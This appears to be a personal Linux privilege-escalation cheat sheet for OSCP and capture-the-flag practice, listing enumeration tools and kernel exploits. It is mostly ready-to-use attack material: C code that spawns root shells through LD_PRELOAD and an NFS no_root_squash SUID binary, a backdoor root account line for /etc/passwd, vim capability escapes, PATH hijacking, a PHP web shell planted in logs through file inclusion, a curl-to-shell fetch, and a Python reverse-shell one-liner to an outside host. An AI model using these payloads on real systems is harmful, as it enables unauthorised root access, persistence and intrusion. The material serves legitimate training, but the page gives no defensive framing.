Enum_linux | cheatsheet

Automated Enumeration Tools

LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
LinEnum: https://github.com/rebootuser/LinEnum
LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
Linux Priv Checker: https://github.com/linted/linuxprivchecker

https://bitvijays.github.io/LFC-VulnerableMachines.html#ctf-series-vulnerable-machines https://blog.theshahzada.com/2021/01/linux-privilege-escalation.html https://0xneel.medium.com/privilege-escalation-enumeration-checklist-2d995e9ddfe7 https://fieldraccoon.github.io/posts/Linuxprivesc/

OSCP https://www.blakejarvis.com/oscp/oscp-things-to-try-when-stuck

Process running

lsof can bring back deleted files https://www.linux.com/news/bring-back-deleted-files-lsof/ list open files lsof -I -n

Looking into /proc/self/cmdline will reveal which process running

PSPY

Exploits

DirtyCOW AddUser (Ubuntu <4.4/<3.13; Debian <4.7.8)
DirtyCOW Pokeball (Linux Kernel 2.6.22 < 3.9)
Mempodipper (Linux 2.6.39<3.2.2 Gentoo/Debian)
Full Nelson (Linux 2.6.31<2.6.37 RedHat/Debiab)
Half Nelson (Linux Kernel 2.6.0<2.6.36.2)
Clown NewUser (Linux 3.0<3.3.5)
fasync_helper (Linux Kernel <2.6.28)
overlayfs (Linux 3.13.0<3.19)
pipe.c root(kit?) (Kernel 2.6.x (32 Bit only!))
PERF_EVENTS (Kernel 2.6.32-3.8.10)
CAN BCM Exploit (Kernel <2.6.36)
Cups local Exploit (Cups <1.1.17)

Important Commands

Generate a passwod

openssl passwd -1 -salt THM Password1
$1$THM$T5GbaVFIumCx94QUC3yLU1

List system capabilities

https://linux.die.net/man/7/capabilities

capsh --print 
groups
id

Retrieve sudo version

sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"

Show OS version

cat /etc/*release
cat /proc/version
cat /etc/issue
uname -a

Run linpeas in one line

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

Is ssh running?

ss -antlp | grep sshd

Who is there?

w / pinky / finger
lastlog

LFI local file inclusion / RFI

https://labs.com/index.php?err=php://filter/resource=index.php https://labs.com/index.php?err=filter/read=string.rot13/resource=/etc/passwd https://labs.com/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd

Write PHP in logs then https://labs.com/login.php?err=/tmp/sess_vc4567al6pq7usm2cufmilkm45

Priv. exp.: Sudo

Summary steps for LD_PRELOAD

sudo -l Check for LD_PRELOAD (with the env_keep option)
Write a simple C code compiled as a share object (.so extension) file
Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

The C code will simply spawn a root shell and can be written as follows;

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

Priv. exp.: SUID

SUID on GtfoBin https://gtfobins.github.io/#+suid

Find suid

find / -perm -4000 -o -perm -2000 -type f 2>/dev/null

Add backdoor user

Check passwd permissions
```
ls -ail /etc/shadow /etc/passwd
```

Add user backdoor information to /etc/passwd

backdoor:$1$THM$T5GbaVFIumCx94QUC3yLU1:0:0:root:/root:/bin/bash

use Backdoor new account
```
su backdoor  #pass: Password1
```

Priv. exp.: Capabilities

list enabled capabilities

We can use the getcap

$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_
net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep

GTFObins has a good list of binaries that can be leveraged for privilege escalation if we find any set capabilities.

We notice that vim can be used with the following command and payload:

$ ls -l /home/karen/vim
-rwxr-xr-x 1 root root 2906824 Jun 18 11:46 /home/karen/vim
$ $ ls -l /usr/bin/vim
lrwxrwxrwx 1 root root 21 Oct 26  2020 /usr/bin/vim -> /etc/alternatives/vim

We can do these, to get root

./view -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Active ports

List the active ports

((netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null

Priv. exp.: Crontab

$ cat /etc/crontab

* * * * *  root /script.sh

Priv. exp.: $PATH

What folders are located under $PATH

Does your current user have write privileges for any of these folders?

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

Can you modify $PATH?
Is there a script/application you can start that will be affected by this vulnerability?
```
export PATH=/tmp:$PATH
```

$ cd /tmp
$ echo "/bin/bash" > murdoch
$ chmod 777 murdoch 
$ ls -l murdoch
-rwxrwxrwx 1 karen karen 10 Nov 19 23:01 murdoch
$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
$ export PATH=/tmp:$PATH
$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
$ ls -l /tmp/murdoch
-rwxrwxrwx 1 karen karen 10 Nov 19 23:01 /tmp/murdoch

/tmp$ cat rootme.c
int main(void)
{
setgid(0);
setuid(0);
execl("/bin/sh","sh",0);
}

Priv. exp.: Contaminating log files

nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

Thewn call the log file

Priv. exp.: NFS

Need “no_root_squash” option

$ cat /etc/exports
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)

showmount -e 10.10.246.35
Export list for 10.10.246.35:
/tmp                      *

# mkdir /tmp/test
/tmp# mount -o rw 10.10.246.35:/tmp /tmp/test
/tmp/backup# cat exploit.c
int main()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
	return 0;
}

/tmp/test# gcc exploit.c -o exploit -w
/tmp/test# sudo chown root.root exploit
/tmp/test# sudo chmod +s exploit
/tmp/test# ls -al exploit
-rwxr-xr-x 1 root root 8392 Nov 20 00:18 exploit

We can simply do cp /bin/bash /tmp/test/. Then chmod +s /tmp/test/bash

If you find some directory that is configured as no_root_squash/no_all_squash you may be able to privesc.

# Attacker, as root user

mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn

# Victim

cd <SHARE>
./pwn # Root shell

Stabilize shell

Set terminal size without passing the rows

stty raw -echo; (stty size; cat) | nc -lvnp 21

see stty conf stty -a

nc -nvlp 4444            


python3 -c 'import pty; pty.spawn("/bin/bash")'                            

python2 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg
reset
stty rows 19 columns 126; export SHELL=bash; export TERM=xterm-256color; alias ll='clear; ls -lsaht --color=auto'
stty rows 26 columns 118; export SHELL=bash; export TERM=xterm; alias ll='clear; ls -lsaht --color=auto'

without python with script

script /dev/null -c bash
Ctrl-Z    
stty raw -echo; fg
reset
stty rows 25 columns 240; export SHELL=bash; export TERM=xterm-256color; alias ll='clear; ls -lsaht --color=auto'
stty rows 25 columns 240; export SHELL=bash; export TERM=xterm; alias ll='clear; ls -lsaht --color=auto'

another version

/usr/bin/script -qc /bin/bash /dev/null

Oneliner

export RHOST="192.168.49.234";export RPORT=80;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Persistence SSH

ssh-keygen -f dasith
cat dasith.pub
chmod 600 dasith

Vi config

syntax on
set number
set mouse-=a

Linux Enumeration [ cheatsheet ]